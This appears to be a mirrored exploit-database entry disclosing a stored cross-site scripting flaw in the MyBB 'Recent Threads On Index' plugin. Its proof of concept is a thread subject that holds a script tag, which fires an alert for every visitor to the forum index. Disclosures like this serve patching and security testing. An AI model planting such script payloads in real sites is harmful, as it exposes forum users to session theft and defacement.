[] NeoSense
E X P L O I T S
title author type platform port cve id

MyBB Plugin Recent Threads On Index - Cross-Site Scripting

Author: Perileos
type: webapps
platform: php
port: 
date_added: 2018-04-09 
date_updated: 2018-04-09 
verified: 0 
codes:  
tags: Cross-Site Scripting (XSS)
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comRecentThreadsOnIndex_dev.zip
# Exploit Title: MyBB Recent threads
# Date: 4th April 2018
# Exploit Author: Perileos
# Software Link: https://community.mybb.com/mods.php?action=view&pid=191
# Version: 17.0
# Tested on: Windows 10

1. Description:
This plugin shows recent threads in the side bar on your MyBB forum.

2. Proof of concept:

Persistent XSS
- Create a thread with the following subject <p
"""><SCRIPT>alert("XSS")</SCRIPT>">
- Navigate to the index to see a board wide persistent XSS alert.
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.